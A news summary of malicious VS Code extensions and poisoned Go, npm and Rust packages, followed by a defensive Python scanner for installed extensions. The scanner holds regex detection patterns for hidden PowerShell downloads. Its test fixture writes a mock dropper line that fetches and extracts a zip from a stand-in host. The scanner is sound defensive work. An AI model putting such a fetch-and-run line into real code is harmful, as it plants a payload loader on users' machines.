Cybersecurity Threats: Malicious Packages Found in Developer Tools
Full Transcript
Cybersecurity researchers have discovered two malicious extensions on the Microsoft Visual Studio Code Marketplace that are designed to infect developer machines with stealer malware. The extensions, named BigBlack.bitcoin-black and BigBlack.codo-ai, masquerade as a premium dark theme and an AI-powered coding assistant respectively, but they harbor functionality to download additional payloads, take screenshots, and siphon data.
According to Koi Security's Idan Dardikman, the malware can capture code, emails, Slack DMs, WiFi passwords and clipboard content, hijack browser sessions, and send the stolen information to an attacker-controlled server.
Microsoft has removed these extensions, with BigBlack.bitcoin-black having 16 installs and BigBlack.codo-ai having 25 installs. A third package named BigBlack.mrbigblacktheme was also removed for containing similar malware.
The extensions use PowerShell scripts to download a password-protected ZIP archive from an external server and try several methods to extract the main payload from it. Later versions evolved to hide the PowerShell window and to use batch scripts for the download.
The main payload, a rogue DLL named Lightshot.dll, gathers sensitive data and hijacks browser sessions. The disclosure aligns with findings from Socket, which identified malicious packages across Go, npm, and Rust ecosystems.
These include Go packages that typosquat trusted libraries to exfiltrate data, npm packages published by a likely French-speaking threat actor that execute reverse shells, and a Rust crate named finch-rust that acts as a malware loader.
Socket researcher Kush Pandya noted that finch-rust appears benign while it executes a malicious payload through a credential-stealing package known as sha-rust, complicating detection efforts.
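As an added defender-side check that is not part of the original report, the following script inventories an unpacked VS Code extensions folder, flags the three BigBlack extension IDs named above, and also flags any extension whose JavaScript shows two or more traits of the loader behaviour described (spawning PowerShell, hiding the window, downloading or extracting an archive, running a batch script). The heuristic patterns and the sample extension folders are my own constructions, not indicators published by Koi Security or Microsoft.

```python
import json
import re
import tempfile
from pathlib import Path

# Extension IDs (publisher.name) named in the report, lower-cased for comparison.
KNOWN_BAD_IDS = {"bigblack.bitcoin-black", "bigblack.codo-ai", "bigblack.mrbigblacktheme"}

# Heuristic patterns (constructed here, not the report's IoCs) for the described behaviour:
# shelling out to PowerShell, hiding its window, fetching/unpacking an archive, batch scripts.
SUSPICIOUS_PATTERNS = {
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "download_or_unzip": re.compile(r"Invoke-WebRequest|DownloadFile|Expand-Archive", re.I),
    "batch_script": re.compile(r"\.(bat|cmd)\b", re.I),
}

def scan_extension(ext_dir: Path) -> dict:
    """Inspect one unpacked extension: its manifest ID plus heuristic hits in its JS files."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    ext_id = f"{manifest.get('publisher', '')}.{manifest.get('name', '')}".lower()
    indicators = set()
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        indicators.update(n for n, p in SUSPICIOUS_PATTERNS.items() if p.search(text))
    return {"id": ext_id, "known_bad": ext_id in KNOWN_BAD_IDS, "indicators": sorted(indicators)}

def scan_extensions_root(root: Path) -> list:
    """Flag extensions under a VS Code extensions folder (e.g. ~/.vscode/extensions)
    that are on the known-bad list or show two or more loader traits."""
    flagged = []
    for ext_dir in sorted(p for p in root.iterdir() if (p / "package.json").is_file()):
        result = scan_extension(ext_dir)
        if result["known_bad"] or len(result["indicators"]) >= 2:
            flagged.append(result)
    return flagged

def build_sample_root() -> Path:
    """Constructed fixture: a benign theme beside a look-alike carrying a loader stub."""
    root = Path(tempfile.mkdtemp())
    for folder, manifest in (("someone.nice-theme-1.0.0", {"publisher": "someone", "name": "nice-theme"}),
                             ("bigblack.bitcoin-black-0.0.3", {"publisher": "BigBlack", "name": "bitcoin-black"})):
        (root / folder).mkdir()
        (root / folder / "package.json").write_text(json.dumps(manifest))
    # Constructed stand-in for the dropper behaviour described, not the real extension's code.
    (root / "bigblack.bitcoin-black-0.0.3" / "extension.js").write_text(
        'require("child_process").exec(\'powershell -WindowStyle Hidden -c "Invoke-WebRequest '
        'https://example.invalid/p.zip -OutFile p.zip; Expand-Archive p.zip"\');')
    return root
```

Point `scan_extensions_root` at a real `~/.vscode/extensions` directory to review installed extensions; a hit on the heuristic alone is a prompt for manual inspection, not proof of compromise.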